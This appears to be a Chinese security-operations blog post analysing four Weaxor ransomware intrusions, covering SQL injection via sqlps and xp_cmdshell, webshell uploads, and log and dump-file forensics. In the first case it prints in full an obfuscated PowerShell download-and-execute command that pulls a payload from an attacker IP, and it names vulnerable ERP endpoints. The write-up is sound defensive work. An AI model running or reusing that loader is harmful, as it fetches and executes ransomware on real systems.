前言

作为安全人员运营人员，不仅要处理好每次安全事件，更加需要从每次应急事件中总结沉淀经验。一方面是帮助自己在下一次事件处置中可以更快更准的分析，提升自己的专业技能；另一方面，也需要根据攻击者攻击方式，思考如何帮助企业可以更好的提升他们的安全建设，虽然安全永远不能以逸待劳，起码可以针对目前已知的攻击方式进行有效的防御，保护企业数据信息安全，业务正常运营。

通过下面4个案例，来总结下近期遇到的勒索事件。4个案例各有特点，有的日志完整，通过主机本身日志，便可以溯源攻击路径；有的日志被删除，通过dmp文件找攻击痕迹；有的利用未公开的漏洞，通过运营平台日志分析，获取0day漏洞信息。但是这些万变不离其宗，只要掌握的整体分析思路，就能从蛛丝马迹中获取关键线索。

案例一：主机日志完整结合AI Agent分析

运营平台产生勒索病毒告警信息

通过自研工具查看主机系统日志，发现在勒索文件落地前，存在大量show advanced options、xp_cmdshell、Ole Automation Procedures修改记录

在对应时间存在典型sqlps.exe执行混淆powershell记录，使用自动化AI工作流工具进行解码，获取勒索外联IOC：1124.104.190:13361

powershell混淆代码，有兴趣的可以尝试自己解码

sqlps . ( $PshOMe[21]+$pSHoMe[34]+'X')([StRINg]::JOIn('',[CHAr[]]( 46,40 ,34 , 123 , 48, 125, 123,49, 125, 34, 32 , 45,102,32, 39, 73, 69 , 39,44, 39, 88 ,39, 41,32, 40 ,40, 38,40,34, 123 , 48 , 125 , 123 ,49,125, 123 ,50,125, 34 , 45, 102 , 39 , 110,101 , 119, 45,111 , 98, 106 ,101,39 , 44 ,39 ,99 ,39,44 ,39,116, 39, 41 , 32, 40,34 ,123,51 ,125 ,123, 48, 125, 123, 50, 125 , 123,49,125,34 ,45, 102 , 39,99, 39, 44 , 39,116, 39 , 44, 39,108 ,105, 101 , 110, 39 , 44 ,39, 110 ,101 , 116 ,46 ,119 ,101, 98, 39 , 41 , 41,46 ,40 ,34 , 123,49 , 125 ,123 , 51, 125 ,123, 52 ,125,123,48, 125, 123 ,50,125 , 34 , 45,102,39 , 115 ,39 ,44,39 ,100 ,111,39,44, 39 , 116 , 114,105,110, 103 ,39,44 , 39,119 ,39,44, 39,110 , 108, 111 ,97 , 100 , 39, 41 , 46 ,73,110 ,118, 111 ,107 ,101,40,40 ,34 ,123 ,53, 125 ,123 , 52 , 125 , 123, 50 , 125,123 , 54 , 125 ,123 , 49 , 125 ,123,48 ,125,123, 51 , 125 ,34 ,32 ,45, 102,32 , 39, 75, 39 , 44,39, 51,51, 54, 49 ,47 ,68 ,39 , 44 ,39,58 , 47,47, 49, 39, 44,39, 73, 73, 79, 39, 44 ,39,116 , 112 , 39, 44,39,104 ,116 ,39 ,44 , 39 ,54, 48,46,49 , 50 , 52 ,46,49 ,48,52,46,49 ,57, 48, 58, 49 , 39 , 41 ,41 , 41 ) ) 

分析主机web日志，根据数据库配置修改修改和powershell执行时间，定位漏洞 利用接口：/handler/SMTLoadingMaterial.ashx，网上已有相关漏洞信息，经过测试用户确认存在对应漏洞

将主机关键日志同步自己写的溯源分析AI智能体，全面整体分析下攻击路径，看看效果：

案例二：日志文件删除，分析DMP文件

查看用户主机文件，定位勒索信和勒索病毒文件，确认主机在02-06 12:26感染勒索病毒

查看主机日志，发现主机系统日志文件被删除，用户侧日志删除忘记截图了，补充一张之前的，都长一个样。并且现在勒索软件在运行的时候都会删除日志，给溯源造成很大的苦难，尤其是用户在没有任何第三方安全设备日志的情况下，简直就是男上加男。

细心的你发现了一个叫做sqlps.exe.dmp文件，并且生成时间在勒索病毒前不久，而且长期分析相关事件的依靠敏锐的直接和浓厚的经验，猜测里面可能有我们想要的东西，找到大佬帮忙看了下 果然有我们想要的东西，熟悉的splps执行恶意powershell

有了SQLPS的恶意执行记录，客户业务部署模式为站库分离，直接查看web服务器的访问日志，确认漏洞接口；

在iis进程内存中也有对应的SQL语句请求记录

由于客户明源云erp版本较低，漏洞也是一大堆，就没必要确认确认到底是是哪个接口了，直接升级版本完事

案例三：无公开漏洞信息，大数据同源分析获取1day漏洞

运营平台产生勒索病毒告警信息（时间与主机相差8个小时）

查看主机日志，并未发现异常的powershell命令执行记录和数据库组件开启记录，但是通过webshell查杀发现多个webshell文件，并且通过webshell内容，大致可以判断是注入notepad.exe的远控后门；

查看火绒的日志，告警内容和webshell功能相匹配，并且在告警内容中，确认父进程为IIS服务进程；

查看IISweb访问日志，确认攻击接口/jk/Y***anLi/Yun***uo.ashx；

但是由于用户没有部署网侧安全设备和流量分析设备，无法通过客户自己的环境确认漏洞详细信息，此时查看我们的自己运营平台同源全网日志确认攻击IP：114.67.126.141的攻击行为和上传后门的数据包。经过测试此接口确认可以上传成功

案例四：勒索威胁情报提前发现，但未即使封锁IOC地址

用户反馈主机文件被加密，并且出现勒索信，根据勒索信内容，可以判断是：Weaxor家族,勒索信落地时间为：02-04 10:12

根据主机火绒日志可以确认，攻击者利用sqlps 执行恶意powershell命令，并且与勒索信落地时间相近；

查看对应web日志，在执行SQLPS命令时间点，发现存在异常接口访问日志

利用安全运营平台全网查看对应攻击IP，发现存在大量命中勒索规则的告警日志，因此可以推断，攻击者利用此接口实施SQL注入攻击行为

我们对同源IP的攻击payload进行分析，确认用户主机侧火绒sqlps告警日志与运营平台的paylaod解码处理后完全相同，因此再次证实，攻击者的攻击IP和利用的漏洞接口；

利用自研反混淆工作流，提取勒索外联IOC和URL

查看自研威胁情报，该IOC情报已在客户感染前30分钟进行推送（如果用户根据情报封锁此外联IP，将会避免本次勒索事件）

总结

Weaxor 勒索病毒，近几年最为常见，每天都会有大量的扫描攻击。但是攻击方式目前主要通过漏洞进行。漏洞选择上，多数选择可直接执行主机命令的漏洞，例如SQLServer数据库的SQL注入漏洞、.Net反序列化命令等等，除了命令执行漏洞外，也会利用文件上传漏洞获取主机权限从而投放勒索病毒。

各位安全从业人员或者企业运维人员需要知道一个原则：没有安全设备可以防护所有攻击，安全永远不能一劳永逸。